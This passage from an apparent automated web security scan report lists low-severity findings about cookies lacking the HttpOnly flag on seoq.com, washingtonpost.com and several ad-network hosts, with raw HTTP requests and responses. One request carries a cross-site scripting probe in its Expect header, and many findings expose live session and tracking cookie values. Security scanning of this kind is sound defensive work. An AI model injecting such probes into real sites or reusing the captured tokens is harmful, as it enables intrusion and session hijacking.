Request

GET /wp-content/uploads/2008/09/search-statistics.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=g6ot4dlqueel2sdr2ham4iut67; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.41. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-andrea.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:41:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=lmg6fbb6836tkiuk0pjr3evdb1; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:41:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.42. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-margaret.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:41:45 GMT
Server: Apache
Set-Cookie: PHPSESSID=795fl6vdjvfli5lse7vr7r06p0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:41:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.43. http://www.seoq.com/wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/bilingual-english-spanish-web-designer-developer-tina.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=tr4ndjjlpd3e82sbn9f6m8d2r7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.44. http://www.seoq.com/wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/e-trade-sucks-10-12-minutes-to-get-started.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=m02j41rctmjgo8tsvi3hbfo097; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.45. http://www.seoq.com/wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/e-trade-sucks-not-fast-and-easy.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=f1qmk0sk5uki5li2ehj6rqc7b0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.46. http://www.seoq.com/wp-content/uploads/2008/10/google-stock-rebound.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/10/google-stock-rebound.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/10/google-stock-rebound.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=ns0b5okivesekmg9ppqr13q891; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.47. http://www.seoq.com/wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/11/change-gov-president-obama-transition-team.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=vfiqd2ekptb8ecvbrq2rprvk87; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.48. http://www.seoq.com/wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/11/circuit-city-stock-price-cc.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache
Set-Cookie: PHPSESSID=ep58rjkns66nvt4jbkb8qb8jd2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.49. http://www.seoq.com/wp-content/uploads/2008/12/iphone-starbucks-partnership.gif

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/12/iphone-starbucks-partnership.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/12/iphone-starbucks-partnership.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=mh811o08atu0mld55rag6g7c94; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.50. http://www.trafficspaces.net/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trafficspaces.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trafficspaces.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BF8A112B9F95B5CC3B2540868CFE0F67; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 00:53:40 GMT
Content-Length: 599

<!--TRAFFICSPACES_ERROR-->
<div class="content" style="margin-top: 20px">
   <div class="pagenotice">
       <!--<div id="rdcr">--><b class="rdcrtop"><b class="rdcr1"></b><b class="rdcr2"></b><b class="rd
...[SNIP]...

17.51. http://www.washingtonpost.com/wl/jobs/home

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html; charset=ISO8859_1
Expires: Sun, 01 May 2011 23:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: WashingtonJobsSession=qZrzN9tFJw3JhJnTRRd4t88nZFhtDgPRL1L4JF6PJZZvhvG4smnP!-945584298; domain=.washingtonpost.com; path=/
Content-Length: 35809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--Server: jobs3a GUID:f823c81588328017643c787765c5da54 Sun May 01 19:32:53 EDT 2011-->
<head>
<title>
   
       
...[SNIP]...

17.52. http://a.triggit.com/px

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.triggit.com
Path:   /px

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /px?cb=s7l8ya&i=CAEQAiiybjINamFwYW5hdG9yLmNvbUABShhUYjRQT3dBQkt5VUsyaUpMSU1sNHlnPT1Qu5747QRd4XoEQGAAcg8xNzMuMTkzLjIxNC4yNDN4AIABvhmKARUvZWxlcGhhbnQvbG9naW4ucGh0bWw=&gwp=Tb4POwABKyUK2iJLIMl4yvxpGNYmaYG7q1B5DA HTTP/1.1
Host: a.triggit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trgu=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

HTTP/1.1 302 Found
Set-Cookie: trgs=382922425; domain=.triggit.com; path=/;
Location: http://tag.admeld.com/match?admeld_adprovider_id=310&external_user_id=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=ogo3ps
Date: Mon, 02 May 2011 02:00:25 GMT
Content-Length: 11
Content-Type: text/html; charset=ISO-8859-1

Redirecting

17.53. http://ab-m.d.chango.com/m/ab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ab-m.d.chango.com
Path:   /m/ab

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/ab HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ab-m.d.chango.com

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://ads.adbrite.com/adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=3728e74c-7461-11e0-9185-00259009a9e4; Domain=chango.com; expires=Thu, 29 Apr 2021 02:09:30 GMT; Path=/
Connection: close


17.54. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.turn.com
Cookie: uid=3207951335209607633; rrs=undefined%7C2%7C3%7Cundefined%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004; rds=undefined%7C15013%7C15013%7Cundefined%7Cundefined%7C15013%7C15013%7C15013%7C15013%7C15013%7C15013%7C15013%7Cundefined%7C15013; rv=1; pf=_90PbWHCfHQmA1ivIIw5G4EMKdh5ityF6sgfR1rZxdwyIhcl0EGWggtbGC91oY8VKc-gdz7WzBmsN9YXs4uSIOzqBFjueX7aZwnvRhcSBs3iaWve_wv63PKco4w-BWK9o8OpL6FMs5ncMADcj7HCCZOL681iuOj2kWoOE2k1qPBfidfcs42JZlIwUalAHVDrgEz_nvLc-cdbQ5JtcKrDVQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3207951335209607633; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:09:28 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:09:28 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3207951335209607633&rnd=6934683957726833621&fpid=7&nu=n&t=
...[SNIP]...

17.55. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?WaUDANGUGAASSlUAAAAAALwODwAAAAAAAgEAAAIAAAAAAP8AAAABE5OuAQAAAAAA8yMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9JAIAAAAAAAIAAgAAAAAAHLEWnwIAKEAcsRafAgAoQByxFp8CAChAHLEWnwIAKEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-dWh0P9IGCuCoJ9BtI0ZMuxgp1sWK95UJMhZwAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15ps83od6%2FM%3D787833.14445110.14291877.12665044%2FD%3Dnews%2FS%3D96654906%3ALREC2%2FY%3DYAHOO%2FEXP%3D1304299983%2FL%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%2FB%3DHqq_KEwNPVs-%2FJ%3D1304292783315180%2FK%3DmbmuBMnyuFXFamzNMr12dQ%2FA%3D6261233%2FR%3D0%2F%2A%24,http%3A%2F%2Fnews.yahoo.com%2Fs%2Fprweb%2F20110427%2Fbs_prweb%2Fprweb5276794,_PVID%3DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%26Z%3D300x250%26cb%3D1304292783315180%26x%3Dhttp%253A%252F%252Fglobal%252Eard%252Eyahoo%252Ecom%252FSIG%253D15ps83od6%252FM%253D787833%252E14445110%252E14291877%252E12665044%252FD%253Dnews%252FS%253D96654906%253ALREC2%252FY%253DYAHOO%252FEXP%253D1304299983%252FL%253DBZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt%252FB%253DHqq%255FKEwNPVs%252D%252FJ%253D1304292783315180%252FK%253DmbmuBMnyuFXFamzNMr12dQ%252FA%253D6261233%252FR%253D0%252F%252A%2524%26S%3D14445110%26i%3D140477%26D%3Dzip%253D05672%2526ycg%253D%2526yyob%253D%26_salt%3D3283334435%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.yahoo.com%252Fs%252Fprweb%252F20110427%252Fbs_prweb%252Fprweb5276794%26r%3D0,65973c16-744b-11e0-a09d-003048d6d2fe HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt&ad_type=iframe&ad_size=300x250&site=140477&section_code=14445110&cb=1304292783315180&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15ps83od6/M=787833.14445110.14291877.12665044/D=news/S=96654906:LREC2/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=Hqq_KEwNPVs-/J=1304292783315180/K=mbmuBMnyuFXFamzNMr12dQ/A=6261233/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; 